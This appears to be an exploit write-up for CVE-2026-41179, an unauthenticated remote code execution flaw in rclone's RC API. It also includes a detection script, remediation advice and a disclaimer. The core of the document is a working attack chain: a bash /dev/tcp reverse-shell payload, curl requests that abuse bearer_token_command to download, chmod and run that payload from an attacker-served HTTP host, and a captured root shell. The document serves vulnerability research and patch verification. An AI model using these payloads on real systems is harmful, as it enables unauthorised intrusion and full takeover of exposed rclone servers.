## https://sploitus.com/exploit?id=9B9009B8-AC90-5EE8-BA73-9ADB1ADB091D
# CVE-2026-41179 — rclone RC API Unauthenticated RCE

> ⚠️ **EDUCATIONAL PURPOSES ONLY**
> This repository is intended strictly for security research, education, and authorized lab environments. PSSec and the contributors of this repository do not condone, support, or take any responsibility for any unauthorized, illegal, or malicious use of the information, code, or techniques contained herein. By using this repository you agree that you are solely responsible for your actions and that you will only test against systems you own or have explicit written permission to test.

---

## Overview

**CVE-2026-41179** is a critical unauthenticated Remote Code Execution (RCE) vulnerability in rclone's built-in Remote Control (RC) API, affecting versions **1.48.0 through 1.73.4**.

| Detail | Value |
|---|---|
| **CVE** | CVE-2026-41179 |
| **CVSS Score** | 9.8 (Critical) |
| **Affected Versions** | rclone 1.48.0 – 1.73.4 |
| **Patched Version** | rclone 1.73.5 |
| **Component** | RC API (`/operations/fsinfo` endpoint) |
| **Attack Vector** | Network — no authentication required |

### How It Works

rclone ships with a built-in HTTP remote control interface (`rcd`). The `/operations/fsinfo` endpoint accepts a user-supplied `fs=` string that is parsed and used to instantiate a backend — including the WebDAV backend. The WebDAV backend supports a `bearer_token_command` parameter, which is passed directly to `exec.Command()` without sanitization. Because no authentication is required on this endpoint by default, an unauthenticated attacker can trigger arbitrary OS command execution as the rclone process user.

**Attack chain in brief:**

```
POST /operations/fsinfo (no auth)
  → rc.GetFs() parses attacker-controlled fs= string
    → WebDAV backend instantiated with attacker params
      → bearer_token_command extracted
        → exec.Command() fires OS command
          → RCE as rclone process user
```
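A detection-side check, added here as an example and not part of this repository: it parses rclone's connection-string syntax (`:backend,key=value,key='quoted':path`) and flags RC requests to `/operations/fsinfo` whose `fs=` sets `bearer_token_command`, so request logs or a WAF can catch the chain above before `exec.Command()` runs. The sample body is constructed in the shape of the page's `curl` calls; `scan_rc_request`, `parse_connection_string` and `SUSPICIOUS_PARAMS` are this example's own names.

```python
from urllib.parse import parse_qs, urlencode

# Option on the page's attack path; assumption: other backends may expose more.
SUSPICIOUS_PARAMS = {"bearer_token_command"}

# Constructed sample body in the shape of the page's curl (not a real capture).
SAMPLE_BODY = urlencode({"fs": ":webdav,url='http://127.0.0.1/',vendor=other,"
                               "bearer_token_command='/opt/lab/sample.sh':"})

def _read_until(s, i, stops):  # -> (text before the first stop char, its index)
    j = i
    while j < len(s) and s[j] not in stops:
        j += 1
    return s[i:j], j

def parse_connection_string(fs):
    """Parse ':backend,k=v,k='quoted':path' -> (backend, params, path)."""
    _, i = _read_until(fs, int(fs.startswith(":")), ",:")  # ':' = inline backend
    backend, params, n = fs[:i], {}, len(fs)
    while i < n and fs[i] == ",":
        key, i = _read_until(fs, i + 1, "=,:")
        value = ""
        if i < n and fs[i] == "=":
            i += 1
            if i < n and fs[i] in "'\"":  # quoted values may contain ',' and ':'
                q, i = fs[i], i + 1
                while i < n:
                    if fs[i] == q:
                        i += 1
                        if i < n and fs[i] == q:  # doubled quote = literal quote
                            value, i = value + q, i + 1
                            continue
                        break
                    value, i = value + fs[i], i + 1
            else:
                value, i = _read_until(fs, i, ",:")
        params[key] = value
    path = fs[i + 1:] if i < n and fs[i] == ":" else ""
    return backend, params, path

def scan_rc_request(path, body):
    """Return a finding for a /operations/fsinfo POST whose fs= sets a command option."""
    if path != "/operations/fsinfo":
        return None
    for fs in parse_qs(body).get("fs", []):
        backend, params, _ = parse_connection_string(fs)
        hits = SUSPICIOUS_PARAMS.intersection(params)
        if hits:
            return {"backend": backend, "commands": {k: params[k] for k in hits}}
    return None
```

Quoted values are parsed as a unit, so a command hidden behind a `url='http://…'` value containing commas or colons is still attributed to the right key.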

---

## Repository Structure

```
CVE-2026-41179/
├── Dockerfile.rclone          # Vulnerable rclone image (v1.69.3)
├── patched.Dockerfile.rclone  # Patched rclone image (v1.73.5)
├── poc.sh                     # Reverse shell payload
└── instructions               # Step-by-step lab walkthrough
```

---

## Lab Setup & Exploitation (Step-by-Step)

### Prerequisites

- Docker
- A listener: [penelope](https://github.com/brightio/penelope) or `netcat`
- Python 3 (for serving the payload)

---

### Step 1 — Build the Vulnerable Docker Image

```bash
docker build -t rclone-vuln -f Dockerfile.rclone .
```

Builds a Debian-slim container running **rclone v1.69.3** with the RC API exposed on port `5572`.

---

### Step 2 — Run the Vulnerable Container

```bash
docker run -d --name rclone-vuln -p 5572:5572 rclone-vuln
```

The RC API is now accessible unauthenticated at `http://127.0.0.1:5572`.

---

### Step 3 — Start Your Listener

```bash
penelope -p 5555
# OR
nc -lvnp 5555
```

---

### Step 4 — Configure the Reverse Shell Payload

Edit `poc.sh` and set your attacker IP and listening port:

```bash
#!/bin/bash
bash -i >& /dev/tcp// 0>&1
```

---

### Step 5 — Serve the Payload over HTTP

Run this from the same directory as `poc.sh`:

```bash
python3 -m http.server 8888
```

---

### Step 6 — Download the Payload to the Target

```bash
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/usr/bin/curl -o /tmp/shell.sh http://:8888/poc.sh':"
```

---

### Step 7 — Make the Payload Executable

```bash
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/bin/chmod +x /tmp/shell.sh':"
```

---

### Step 8 — Execute the Payload

```bash
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/tmp/shell.sh':"
```

---

### Step 9 — Catch the Shell

Check your listener — you should receive a root shell from the container:

```
[+] Got reverse shell from f7697b831050~172.17.0.3-Linux-x86_64
[+] Shell upgraded successfully using /usr/bin/script!
whoami
root
```

---

### Step 10 — Verify the Patch

Repeat Steps 1–8 using the **patched image** to confirm the vulnerability is fixed:

```bash
docker build -t rclone-patched -f patched.Dockerfile.rclone .
docker run -d --name rclone-patched -p 5573:5572 rclone-patched
```

Send the same `curl` request against port `5573` — the command should not execute.

---

## Remediation

- **Upgrade rclone to v1.73.5 or later** — authentication is now enforced on all RC endpoints by default.
- If you cannot upgrade immediately, start `rcd` with `--rc-user` and `--rc-pass` flags to require credentials.
- Restrict network access to the RC port (`5572`) via firewall rules — it should never be exposed to untrusted networks.
- Consider using `--rc-no-auth=false` (the new default in patched versions) explicitly in startup scripts.

---

## Disclaimer

This repository is provided **for educational and authorized security research purposes only**. The proof-of-concept code demonstrates a real vulnerability in a controlled Docker lab environment.

**PSSec and all contributors:**
- Do **not** authorize or encourage exploitation of systems without explicit written permission from the system owner.
- Take **no responsibility** for any damage, data loss, legal consequences, or misuse arising from the use of this material.
- Recommend that all testing be performed **only in isolated lab environments** that you own or are explicitly authorized to test.

Unauthorized use of this code against production systems or systems you do not own may violate computer fraud and cybercrime laws in your jurisdiction.

---

*CVE-2026-41179 — Research by PSSec*